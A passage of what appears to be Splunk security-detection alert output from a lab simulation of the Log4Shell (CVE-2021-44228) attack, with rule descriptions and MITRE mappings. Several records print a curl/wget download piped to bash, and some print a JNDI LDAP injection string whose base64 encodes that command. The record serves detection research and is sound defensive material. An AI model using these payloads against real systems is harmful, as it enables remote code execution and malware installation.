Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644252, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 5", annotations._all="CIS 3", annotations._all="CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Exploitation", annotations._all="Stage:Execution", annotations._all="Reconnaissance", annotations._all="T1190", annotations._all="DE.CM", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642644254, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="DE.AE", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="DE.CM", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="CIS 12", annotations._all="T1190", annotations._all="Command and Control", annotations._all="PR.DS", annotations._all="PR.PT", annotations._all="CIS 13", annotations._all="T1059", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642644254, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="DE.AE", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="DE.CM", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="CIS 12", annotations._all="T1190", annotations._all="Command and Control", annotations._all="PR.DS", annotations._all="PR.PT", annotations._all="CIS 13", annotations._all="T1059", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642644252, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 5", annotations._all="CIS 3", annotations._all="CVE-2021-44228", annotations._all="Source:Application Log", annotations._all="Exploitation", annotations._all="Stage:Execution", annotations._all="Reconnaissance", annotations._all="T1190", annotations._all="DE.CM", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644216, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", 